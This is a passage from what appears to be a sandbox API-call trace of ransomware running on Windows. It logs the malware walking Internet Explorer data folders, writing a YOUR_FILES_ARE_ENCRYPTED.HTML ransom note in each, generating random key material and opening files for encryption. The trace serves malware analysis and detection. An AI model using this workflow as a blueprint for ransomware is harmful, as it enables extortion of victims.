(pszPath="{8D617CED-7674-11EB-B0B5-0011F4BD9832}.dat") returned=".dat" [0111.186] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0111.186] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active\\{8D617CED-7674-11EB-B0B5-0011F4BD9832}.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\internet explorer\\recovery\\active\\{8d617ced-7674-11eb-b0b5-0011f4bd9832}.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0111.187] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5594e739, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x5594e739, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x56323a62, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x632a08, dwReserved1=0x19df88, cFileName="{8D617CED-7674-11EB-B0B5-0011F4BD9832}.dat", cAlternateFileName="{8D617~2.DAT")) returned 0 [0111.187] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0111.187] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 113 [0111.187] GetProcessHeap () returned 0x600000 [0111.187] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0111.187] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Active\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\internet explorer\\recovery\\active\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0111.187] WriteFile (in: hFile=0x32c, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0111.188] CloseHandle (hObject=0x32c) returned 1 [0111.189] GetProcessHeap () returned 0x600000 [0111.189] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0111.189] GetProcessHeap () returned 0x600000 [0111.189] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0111.190] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5009f3d3, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x5009f3d3, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x5009f3d3, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e324, dwReserved1=0x30b6822, cFileName="Active", cAlternateFileName="")) returned 0 [0111.190] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0111.190] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 106 [0111.190] GetProcessHeap () returned 0x600000 [0111.190] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0111.191] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\internet explorer\\recovery\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0111.191] WriteFile (in: hFile=0x31c, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0111.192] CloseHandle (hObject=0x31c) returned 1 [0111.192] GetProcessHeap () returned 0x600000 [0111.192] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0111.192] GetProcessHeap () returned 0x600000 [0111.192] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0111.193] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TabRoaming", cAlternateFileName="TABROA~1")) returned 1 [0111.194] StrStrIW (lpFirst="TabRoaming", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.194] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\TabRoaming") returned 78 [0111.194] GetProcessHeap () returned 0x600000 [0111.194] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0111.195] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\TabRoaming" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\TabRoaming") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\TabRoaming" [0111.195] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\TabRoaming", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\TabRoaming\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\TabRoaming\\*" [0111.195] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\TabRoaming\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e324, dwReserved1=0x30b6822, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0111.195] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e324, dwReserved1=0x30b6822, cFileName="..", cAlternateFileName="")) returned 1 [0111.195] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e324, dwReserved1=0x30b6822, cFileName="..", cAlternateFileName="")) returned 0 [0111.195] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0111.195] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\TabRoaming\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0111.195] GetProcessHeap () returned 0x600000 [0111.196] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0111.196] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\TabRoaming\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\internet explorer\\tabroaming\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0111.197] WriteFile (in: hFile=0x31c, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0111.197] CloseHandle (hObject=0x31c) returned 1 [0111.198] GetProcessHeap () returned 0x600000 [0111.198] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0111.198] GetProcessHeap () returned 0x600000 [0111.198] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0111.199] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Tracking Protection", cAlternateFileName="TRACKI~1")) returned 1 [0111.199] StrStrIW (lpFirst="Tracking Protection", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.199] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\Tracking Protection") returned 87 [0111.199] GetProcessHeap () returned 0x600000 [0111.199] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0111.199] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\Tracking Protection" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\Tracking Protection") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\Tracking Protection" [0111.199] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\Tracking Protection", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\Tracking Protection\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\Tracking Protection\\*" [0111.199] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\Tracking Protection\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e324, dwReserved1=0x30b6822, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0111.200] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e324, dwReserved1=0x30b6822, cFileName="..", cAlternateFileName="")) returned 1 [0111.200] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42ce6642, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42ce6642, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e324, dwReserved1=0x30b6822, cFileName="..", cAlternateFileName="")) returned 0 [0111.200] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0111.200] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\Tracking Protection\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 117 [0111.200] GetProcessHeap () returned 0x600000 [0111.200] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0111.200] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\Tracking Protection\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\internet explorer\\tracking protection\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0111.200] WriteFile (in: hFile=0x31c, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0111.201] CloseHandle (hObject=0x31c) returned 1 [0111.202] GetProcessHeap () returned 0x600000 [0111.202] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0111.202] GetProcessHeap () returned 0x600000 [0111.202] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0111.202] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8e7799ea, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0x8e8c0c7b, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0x8e8c0c7b, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="VersionManager", cAlternateFileName="VERSIO~1")) returned 1 [0111.202] StrStrIW (lpFirst="VersionManager", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.202] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\VersionManager") returned 82 [0111.202] GetProcessHeap () returned 0x600000 [0111.202] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0111.203] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\VersionManager" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\VersionManager") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\VersionManager" [0111.203] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\VersionManager", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\VersionManager\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\VersionManager\\*" [0111.203] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\VersionManager\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8e7799ea, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0x8e8c0c7b, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0x8e8c0c7b, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e324, dwReserved1=0x30b6822, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0111.203] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8e7799ea, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0x8e8c0c7b, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0x8e8c0c7b, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e324, dwReserved1=0x30b6822, cFileName="..", cAlternateFileName="")) returned 1 [0111.203] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e8b356b, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0x8e8b356b, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0x8e8b4910, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3f96, dwReserved0=0x19e324, dwReserved1=0x30b6822, cFileName="versionlist.xml", cAlternateFileName="VERSIO~1.XML")) returned 1 [0111.203] StrStrIW (lpFirst="versionlist.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.203] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\VersionManager\\versionlist.xml") returned 98 [0111.203] PathFindExtensionW (pszPath="versionlist.xml") returned=".xml" [0111.204] lstrlenW (lpString=".xml") returned 4 [0111.204] PathFindExtensionW (pszPath="versionlist.xml") returned=".xml" [0111.204] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0111.204] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\VersionManager\\versionlist.xml" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\internet explorer\\versionmanager\\versionlist.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0111.205] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=16278) returned 1 [0111.205] GetProcessHeap () returned 0x600000 [0111.205] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0111.207] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="16") returned 2 [0111.207] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="20") returned 2 [0111.207] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="99") returned 2 [0111.207] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="C1") returned 2 [0111.207] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="F4") returned 2 [0111.207] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="93") returned 2 [0111.207] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="AA") returned 2 [0111.207] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="7E") returned 2 [0111.207] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="61") returned 2 [0111.207] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="1A") returned 2 [0111.208] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="6D") returned 2 [0111.208] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="6A") returned 2 [0111.208] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="E7") returned 2 [0111.208] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="C1") returned 2 [0111.208] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="E8") returned 2 [0111.208] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="ED") returned 2 [0111.208] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="2A") returned 2 [0111.208] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="DD") returned 2 [0111.208] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="BA") returned 2 [0111.208] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="54") returned 2 [0111.208] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="92") returned 2 [0111.208] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="50") returned 2 [0111.208] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="6A") returned 2 [0111.208] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="B7") returned 2 [0111.208] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="F4") returned 2 [0111.208] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="01") returned 2 [0111.208] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="44") returned 2 [0111.208] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="04") returned 2 [0111.208] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="4F") returned 2 [0111.208] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="15") returned 2 [0111.208] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="6E") returned 2 [0111.208] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="3D") returned 2 [0111.209] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\VersionManager\\versionlist.xml" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\VersionManager\\versionlist.xml") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\VersionManager\\versionlist.xml" [0111.209] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0111.209] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0111.209] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e8b356b, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0x8e8b356b, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0x8e8b4910, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3f96, dwReserved0=0x19e324, dwReserved1=0x30b6822, cFileName="versionlist.xml", cAlternateFileName="VERSIO~1.XML")) returned 0 [0111.209] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0111.209] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\VersionManager\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0111.209] GetProcessHeap () returned 0x600000 [0111.209] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0111.209] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Internet Explorer\\VersionManager\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\internet explorer\\versionmanager\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0111.210] WriteFile (in: hFile=0x31c, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0111.211] CloseHandle (hObject=0x31c) returned 1 [0111.216] GetProcessHeap () returned 0x600000 [0111.216] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0111.216] GetProcessHeap () returned 0x600000 [0111.216] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0111.216] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8e7799ea, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0x8e8c0c7b, ftLastAccessTime.dwHighDateTime=0x1d7347a, 